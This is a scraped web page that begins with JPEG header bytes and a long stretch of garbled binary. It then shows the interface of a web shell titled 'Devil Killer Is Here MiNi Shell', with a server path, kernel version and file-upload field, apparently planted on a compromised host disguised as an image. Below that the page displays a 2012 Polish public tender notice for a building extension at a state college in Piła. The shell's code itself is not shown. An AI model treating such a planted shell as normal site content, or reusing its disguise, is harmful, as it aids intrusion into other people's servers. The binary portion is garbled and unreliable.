JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120712/247390-N-2012.html

<p class="kh_header"><b>Piła: Rozbudowa budynku A na potrzeby Centrum Promocji, Karier i Aktywizacji Zawodowej Absolwentów pilskich uczelni</b><br>
<b>Numer ogłoszenia: 247390 - 2012; data zamieszczenia: 12.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa , ul. Podchorążych 10, 64-920 Piła, woj. wielkopolskie, tel. 067 3522632, faks 067 3522609.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa budynku A na potrzeby Centrum Promocji, Karier i Aktywizacji Zawodowej Absolwentów pilskich uczelni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia podzielony został na dwa etapy:
1. etap nr 1 to roboty rozbiórkowe, wybudowanie budynku w stanie surowym zamkniętym, elewacja, domofon, zagospodarowanie terenu oraz wykonanie przyłączy do budynku.
2. etap nr 2 obejmuje wykonanie instalacji wewnętrznych, zamontowanie windy dla osób niepełnosprawnych oraz wykończenie inwestycji.
W niniejszym postępowaniu zadaniem Wykonawcy będzie wykonanie etapu nr 1, etap nr 2 zrealizowany będzie przez Zamawiającego w terminie późniejszym w zależności od posiadanych środków finansowych. 

Teren planowanej inwestycji położony jest w Pile przy ul. Podchorążych 10, na działkach o numerach ewidencyjnych 319 i 68. Działka ta znajduje się w zasobie Państwowej Wyższej Szkoły Zawodowej im. Stanisława Staszica w Pile. Teren objęty planowanymi robotami budowlanymi stanowi zachodnia część działki nr 319, znajdująca się w rejonie głównego wjazdu nieruchomości. Część robót związanych z infrastrukturą i uzbrojeniem prowadzona będzie w pasie drogowym publicznej ulicy Podchorążych na działce nr 68. Działka stanowi teren zabudowany i zagospodarowany. W granicach objętych projektem oraz w bliskim sąsiedztwie na działce występują obecnie następujące obiekty:
1. Budynek istniejącej portierni, dobudowany do budynku głównego A. Jest to obiekt parterowy, częściowo podpiwniczony, z dachem płaskim. Funkcja budynku - portiernia główna PWSZ. Obiekt ten wybudowano w latach 60-tych XX w. Obiekt ten przeznacza się do wyburzenia.
2. Budynek główny oznaczony w ewidencji PWSZ jako budynek A, znajdujący się po stronie południowej od wjazdu. Jest to budynek o czterech kondygnacjach nadziemnych (w tym poddasze użytkowe ), całkowicie podpiwniczony, z dachem stromym. Funkcja obiektu - rektorat PWSZ, Instytut Ochrony Zdrowia. W części północnej znajdują się pomieszczenia hotelowe uczelni z odrębnym wejściem zlokalizowanym w ścianie szczytowej. Budynek ten przeznaczony jest do zachowania, przewiduje się jedynie roboty naprawcze w miejscach styku z wyburzanym obiektem portierni.
3. Budynek dydaktyczny, oznaczony w ewidencji PWSZ jako budynek B, znajdujący się po stronie północnej od wjazdu. Jest to również budynek o czterech kondygnacjach nadziemnych ( w tym poddasze użytkowe), całkowicie podpiwniczony, z dachem stromym. Funkcja obiektu - pomieszczenia dydaktyczne Instytutu Ochrony Zdrowia i Instytutu Ekonomicznego. Budynek ten przeznaczony jest do zachowania, nie przewiduje się żadnych robót budowlanych.
4. Ogrodzenie terenu - stalowe, na cokole betonowym. We fragmencie kolidującym z projektowaną zabudową i nowym zagospodarowaniem przeznacza się do rozbiórki.
5. Brama wjazdowa - stalowa, mocowana na filarach murowanych z cegły licowej. Ze względu na konieczność wyburzenia słupów murowanych, na których zawieszone są przęsła bramy i furtki zakwalifikowano do rozbiórki.
6. Barierka ruchoma, zamykająca wjazd na teren uczelni - stalowa, uruchamiana mechanicznie, sterowana z portierni. Do zachowania, ewentualny demontaż na okres prowadzenia robót budowlanych.
7. Utwardzenia terenu - wjazd, dojścia piesze i chodniki wykonane z kostki granitowej, we fragmentach występują uzupełniające wstawki betonowe. Utwardzenia te przeznaczono do przełożenia i uzupełnienia. W miejscach kolizji z nowym budynkiem utwardzenia rozebrać, materiał wykorzystać do uzupełnień lub budowy utwardzeń w innym miejscu.
8. Uzbrojenie podziemne - w granicach planowanych robót znajdują się sieci i przyłącza: wodociągowa, kanalizacji sanitarnej i deszczowej, energetyczne. Przewidziano do przebudowy z uwagi na przyłączenie nowego budynku oraz do przeniesienia ze względu na kolizje z projektowaną zabudową.
9. Inne elementy: murki oporowe, zatoka utwardzona betonowa - do rozbiórki.
10. Zieleń - Istniejące drzewa (2szt.) będące w kolizji z projektowanymi elementami do wycinki, pozostałe drzewa do zachowania.

Do rozbiórki przeznaczono następujące elementy:
1. Budynek istniejącej portierni, znajdujący się w miejscu planowanej zabudowy. Obiekt ten należy wyburzyć w całości wraz z posadzkami, podpiwniczeniem i fundamentami. Z uwagi na to, że w miejscu tym posadowiony będzie projektowany obiekt należy zadbać o stan podłoża gruntowego, pozostawionego po robotach rozbiórkowych. W miejscu podpiwniczenia istniejącego budynku należy wykonać nasyp budowlany z kruszyw mineralnych, ułożonych warstwami i odpowiednio zagęszczonych.
Parametry rozbieranego budynku:
1/ Wymiary w rzucie 9.8 × 9.8m
2/ Powierzchnia zabudowy 85.2m2
3/ Powierzchnia podpiwniczenia i zejścia do piwnic ~33m2
4/ Ilość kondygnacji nadziemnych 1
2. Zadaszenie przejścia na uczelnie, znajdujące się przy portierni i ścianie szczytowej budynku głównego A. W zakresie rozbiórki wyburzenie 4 słupów murowanych oraz dachu o konstrukcji żelbetowej. 
Parametry liczbowe:
1/ Wymiary w rzucie 9.9 × 3.3m
2/ Powierzchnia zabudowy 32.7m2
3. Ogrodzenie terenu, brama wjazdowa, itp. 
Zakłada się rozbiórkę:
a/ przęsła stalowe bramy - 2szt.,
b/ furtki - 2szt.,
c/ przęsła i słupki stalowe ogrodzenia na długości ok. 46mb,
d/ słupy murowane bram i furtek - 2szt. × 2.0 × 0.4 × 2.5m + 1szt. × 0.8 × 0.4 × 2.5m, wraz z zadaszeniem z dachówki karpiówki,
e/ cokół fundamentowy ogrodzenia na długości ok. 46mb,
f/ murek oporowy przy dojściu do portierni z ulicy o długości ok. 4m.
4. Utwardzenia terenu:
a/ chodnik z kostki granitowej na powierzchni dojścia pieszego przy istniejącym budynku portierni, powierzchnia ok. 150m2,
b/ wstawki uzupełniające z betonu wylewanego mokro, znajdujące się na wjeździe dla samochodów,
c/ wjazd na teren nieruchomości, chodniki w bezpośrednim sąsiedztwie budynku - przełożenie nawierzchni z uwagi na roboty ziemne i sieciowe. Kostkę granitową z rozbiórki wykorzystać do budowy nowych utwardzeń.
5. Inne elementy: murki oporowe, zatoka utwardzona betonowa.
6. Zieleń - Istniejące drzewo będące w kolizji z projektowanym budynkiem (przy narożniku północno-zachodnim) do wycinki lub przesadzenia. Na wycinkę drzewa należy uzyskać zgodę właściwego organu administracji państwowej.

PROJEKTOWANE OBIEKTY KUBTUROWE
Budynek świetlicy
Projektowana obiekt jest to budynek o dwóch kondygnacjach nadziemnych, bez podpiwniczenia, z dachem o kształcie walcowym. Funkcja ogólna obiektu: usługowa związana z funkcjonowaniem uczelni PWSZ w Pile. Obiekt podzielony będzie na dwie części o funkcji szczegółowej:
1. Portiernia główna dla campusu uczelni.
2. Centrum Promocji, Karier i Aktywizacji Zawodowej Absolwentów, z przeznaczeniem do obsługi kandydatów na uczelnię oraz absolwentów wszystkich pilskich szkół.
Projektowany budynek posiadać będzie atrakcyjną, nowoczesną formę oraz wykonany będzie w wysokich standardach wykończenia zewnętrznego. Obiekt wkomponowany będzie w sąsiednią zabudowę i podkreślać będzie atrakcyjność strefy głównego wejścia na teren campusu Uczelni. Proponowane zagospodarowanie terenu przyległego (ogrodzenie, mała architektura i zieleń) poprawi funkcjonalność, uporządkuje ten obszar pod względem architektonicznym i zapewni ład przestrzenny tego miejsca.
Dane liczbowe
1. Kubatura: 2 070.28 m3
2. Powierzchnia zabudowy 216.01 m2

PROJEKTOWANE OBIEKTY NIEKUBATUROWE
Utwardzenie terenu
1. Wjazd na uczelnię - projektuje się pozostawienie istniejącego zjazdu do drogi publicznej ulicy Podchorążych oraz zachowanie układu komunikacyjnego znajdującej się w granicach Uczelni. W ramach robót budowlanych planuje się remont nawierzchni obejmujący następujący zakres prac:
a/ przełożenie nawierzchni na całej powierzchni dojazdu,
b/ usunięcie wstawek betonowych i zastąpienie kostką granitową,
c/ w miejscach robót fundamentowych i robót sieciowych - odbudowa podłoża drogi oraz odtworzenia nawierzchni z kostki granitowej,
2. Zjazd z drogi publicznej - projektuje się remont istniejącego zjazdu bez zmiany jego parametrów (szerokość zjazdu, promienie skrętów). W zakresie planowanych robót:
a/ regulacja krawężników,
b/ przełożenie nawierzchni z kostki granitowej, wyrównanie podbudowy i uzupełnienie ubytków.
3. Chodnik i ciąg pieszy od strony południowej przy ścianie szczytowej budynku A - usunięcie wstawek betonowych i uzupełnienie nawierzchni kostką granitową, przełożenie nawierzchni na pozostałej z wyrównaniem i wyrobieniem spadków w pozostałym obszarze, w bezpośrednim sąsiedztwie projektowanego budynku nawierzchnie nowe z kostki granitowej.
4. Chodnik od strony północnej przy ścianie szczytowej budynku B - chodnik nowy o nawierzchni z kostki granitowej na podbudowie piaskowo-cementowej.
5. Ciągi piesze od strony zachodniej przy ulicy Podchorążych na terenie działki Inwestora - nawierzchnie o konstrukcji chodnikowej z kostki granitowej na podbudowie piaskowo-cementowej.
6. Chodnik ul. Podchorążych stykający się z nawierzchniami jw. - na odcinku pokazanym w części graficznej projektuje się wymianę istniejącej nawierzchni. W zakresie robót: demontaż istniejącej nawierzchni asfaltowej, wykonanie nowej nawierzchni z kostki granitowej na podbudowie piaskowo-cementowej.
Pochylnia dla niepełnosprawnych, schody terenowe, murki oporowe
Konstrukcja i wykończenie elementów:
1. Ściany fundamentowe i cokoły, murek oporowy pochylni przy ścianie podłużnej budynku - betonowe, wylewane na mokro.
2. Płyta biegu schodowego i podestu - żelbetowa, wylewana na mokro.
3. Nawierzchnia pochylni i podestu - z kostki granitowej na podbudowie piaskowo-cementowej.
4. Okładzina schodów - stopnice i podstopnie z płyt granitowych układanych na klej, faktura kamienia antypoślizgowa.
5. Balustrady - ze stali kwasoodpornej w wykonaniu ślusarskim.
6. Okładziny ścian - z płyt kamiennych z piaskowca, mocowane do konstrukcji ścian na klej.
7. Nakrywy murków oporowych i cokołów - z płyt granitowych.
Ogrodzenie terenu
Projektowane elementy:
1. Słupy do kotwienia bramy wjazdowej i furtki - żelbetowe, wylewane na mokro, wykończenie - okładzina z płyt kamiennych z piaskowca układanych na klej, na czapce wylewka betonowa i okładzina z blachy tytanowo-cynkowej.
2. Cokoły fundamentowe ogrodzenia projektowanego - wylewane na mokro z betonu C16/20 z betonu, zbrojone przeciwskurczowo, okładzina z płyt kamiennych z piaskowca, na zwieńczeniu (czapka) okładzina z płyt granitowych.
3. Murek oporowy oddzielający zieleń - konstrukcja i wykończenie jak wyżej.
4. Ogrodzenie projektowane ( przęsła ) - typu ozdobnego, o konstrukcji stalowej z profili kutych mechanicznie z ozdobnymi wstawkami profilowanymi dekoracyjnymi mocowane do słupów stalowych z rur kwadratowych, zabezpieczenie antykorozyjne poprzez cynkowanie ogniowe, malowanie farbami proszkowymi.
5. Brama wjazdowa, furtka - stalowa, konstrukcja i wykończenie jak wyżej,
6. Barierka ruchoma dla samochodów - istniejąca do pozostawienia.
Mała architektura
Projektowane elementy:
1. Murki oporowe oddzielające zieleńce - konstrukcja i wykończenie analogiczne jak cokoły ogrodzeń.
2. Słupy i tablice do ogłoszeń - słupy betonowe lub murowane, okładziny na słupach z kamienia, konstrukcja tablic stalowa, ocynkowana i malowana proszkowo, płyta do zawieszania ogłoszeń podświetlana.
3. Inne elementy - ławki ogrodowe, kosze na śmieci, itp.
Zieleń
1. Drzewo istniejące w obrysie planowanej powierzchni zabudowy - lipa, 1 szt., do wycinki.
2. Drzewa istniejące przy projektowanej furtce - żywotnik zachodni, 1 szt., do wycinki.
3. W pasie wzdłuż istniejącego chodnika przy budynku B - istniejące drzewa (żywotnik zachodni) z wyjątkiem jw. do zachowania, dosadzenie 3 drzew w celu uzyskania zieleni szpalerowej. Drzewa dosadzana - żywotnik zachodni, odm. złota, minimalna wysokość sadzonki 1.5m.
4. Skwer przy bramie wjazdowej oraz pas przy murku oporowym podjazdu dla niepełnosprawnych - nawiezienie ziemi roślinnej i nasadzenie zieleni ozdobnej niskiej (krzewy zimozielone, rośliny kwitnące).
5. Pas terenu przy ścianie szczytowej budynku B - usunięcie istniejących elementów budowlanych, zerwanie istniejącej darni, wyrównanie terenu i nawiezienie ziemi roślinnej, nasadzenie trawy i krzewów ozdobnych.

UZBROJENIE TERENU
1. Istniejący wodociąg główny O150mm znajdujący się pod powierzchnią projektowanej zabudowy - na odcinku pod projektowaną zabudową do likwidacji.
2. Przyłącze wody do projektowanego budynku - do wykonania zgodnie z warunkami technicznymi dostawcy. Podłączenie do istniejącej sieci znajdującej się pod jezdnią istniejącej drogi wewnętrznej na terenie Uczelni.
3. Istniejąca sieć kanalizacji sanitarnej O250mm do studni w ul. Podchorążych znajdująca się w przejściu pieszym pod projektowanym budynkiem - remont polegający na wymianie istniejących rurociągów.
4. Istniejąca kanalizacja sanitarna O200mm znajdująca się pod projektowanym budynkiem o przebiegu równoległym do budynków A i B - rurociągi do pozostawienia, pod ławami fundamentowymi projektowanego budynku wykonać przepusty poprzez wykonanie wylewek z betonu podkładowego.
5. Przyłącze kanalizacji sanitarnej do projektowanego budynku - wykonać na podstawie warunków technicznych dostawcy. Włączenie do istniejącej studni na działce Inwestora.
6. Istniejąca sieć kanalizacji deszczowej O250mm do studni w ul. Podchorążych znajdująca się w przejściu pieszym pod projektowanym budynkiem - remont polegający na wymianie istniejących rurociągów.
7. Przyłącze i przykanaliki kanalizacji deszczowej do projektowanego budynku - wykonać na podstawie warunków technicznych dostawcy. Włączenie do kanalizacji istniejącej na działce Inwestora oraz wykonanie 1 studni w jezdni ul. Podchorążych.
8. Odwodnienie nawierzchni utwardzonych istniejącego wjazdu na teren uczelni - wymiana istniejących wpustów i przykanalików.
9. Przyłącze energii elektrycznej - wykorzystanie okablowania istniejącego przyłącza do budynku portierni. W zakresie robót odkopanie przewodu, przełożenie i wprowadzenie do nowego złącza.
10. Zapewnienie ilości energii dla projektowanego budynku w ramach posiadanej przez Inwestora rezerwy mocy (w tym uwzględniając energię dla wyburzanego budynku portierni). Całość robót prowadzona będzie na instalacjach zewnętrznych za złączem kontrolno-pomiarowym, które są własnością Inwestora. Z tego względu odstąpiono od uzyskania warunków technicznych przyłączenia.
11. Oświetlenie terenu - projektuje się oświetlenie terenu wjazdu, oprawy typu parkowego, ilość 3szt.
12. Instalacje zewnętrzne niskoprądowe (okablowanie oświetlenia terenu, instalacja otwierania furtki).
13. Zasilanie w energię cieplną - włączenie do układu grzewczego w budynku głównym A. W ramach zadania inwestycyjnego do wykonania instalacja przyłączeniowa w budynku A w poziomie piwnic. Nie przewiduje się robót zewnętrznych.
14. Istniejąca sieć w teletechniczna - wzdłuż południowej ściany projektowanego budynku znajduje się główna sieć teleinformatyczna, która jest do zachowania. Zwrócić szczególną uwagę w trakcie robót ziemnych i fundamentowych. W ewentualnej przypadku kolizji z projektowanym budynkiem przesunąć poza obrys ściany.

BILANS TERENU
Bilans terenu w granicach działki Inwestora:
1. Powierzchnia zabudowy
a/ projektowana budynek 216 m2
Razem powierzchnia zabudowy 216 m2
2. Powierzchnia terenów utwardzonych
a/ droga dojazdowa wewnętrzna 434 m2
b/ chodniki, ciągi piesze 399 m2
c/ podjazd dla niepełnosprawnych i schody terenowe 21 m2
d/ opaska projektowanego budynku 8 m2
e/ murki oporowe, ogrodzenia 15 m2
Razem powierzchnia terenów utwardzonych 877 m2
3. Powierzchni terenów biologicznie czynnych 287 m2
Razem powierzchnia części działki objętej projektem 1 380 m2

Bilans terenu w granicach pasa drogowego ul. Podchorążych:
1. Powierzchnia zabudowy 0 m2
2. Powierzchnia terenów utwardzonych
a/ zjazd do drogi publicznej 45 m2
b/ chodniki, ciągi piesze 81 m2
Razem powierzchnia terenów utwardzonych 126 m2
3. Powierzchni terenów biologicznie czynnych 0 m2
Razem powierzchnia części działki objętej projektem 126 m2

Szczegółowe prace do wykonania w etapie nr 1 zawarte zostały w dokumentacji projektowej oraz przedmiarach robót stanowiących załącznik do SIWZ. 
Ewentualne wskazania, w dokumentacji projektowej jak i specyfikacji technicznej wykonania i odbioru robót budowlanych, znaków towarowych lub pochodzenia proszę traktować, jako przykładowe. Wykonawca może zaproponować inne produkty, materiały zapewniające prawidłowe funkcjonowanie całości o parametrach nie gorszych niż wskazane w dokumentacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa art. 67 ust.1 pkt 6 Ustawy, do 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.12.20-6, 45.11.12.00-0, 45.26.23.00-4, 45.26.23.11-4, 45.26.23.10-7, 45.26.25.22-6, 45.26.21.20-8, 45.26.21.10-5, 45.26.11.00-5, 45.26.24.20-1, 45.32.10.00-6, 45.26.12.10-9, 45.26.13.20-3, 45.26.14.00-8, 45.26.14.10-1, 45.41.00.00-4, 45.44.21.10-4, 45.42.11.21-8, 45.42.11.22-5, 45.26.26.50-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia posiadania stosownych uprawnień Wykonawca złoży oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ciągu ostatnich 5 lat, byli głównym wykonawcą przy realizacji, co najmniej dwóch robót odpowiadających swoim rodzajem co przedmiot niniejszego przetargu i wartością min. 1.200.000 zł brutto; powyższe roboty winny być zakończone, na potwierdzenie powyższego składają wykaz wykonanych robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy doświadczenia w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy i usługi zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia posiadania potencjału technicznego Wykonawca złoży oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami posiadającymi prawo wykonywania samodzielnych funkcji technicznych w budownictwie do kierowania i nadzorowania robotami budowlanymi, które będą posiadały uprawnienia budowlane w specjalnościach konstrukcyjno-budowlanej bez ograniczeń, lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa. Kierownik budowy musi wykazać się co najmniej 5-letnim doświadczeniem w pełnieniu funkcji kierownika budowy, na potwierdzenie powyższego składają wykaz zawierający imiona i nazwiska osób, którymi dysponuje Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, będą kierowały robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, tj.: kierownika budowy posiadającego uprawnienia budowlane, określone przepisami Prawa budowlanego oraz oświadczenie, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają polisę a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. na kwotę min. 1.200.000 zł, na piotwierdzenie powyższego składają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

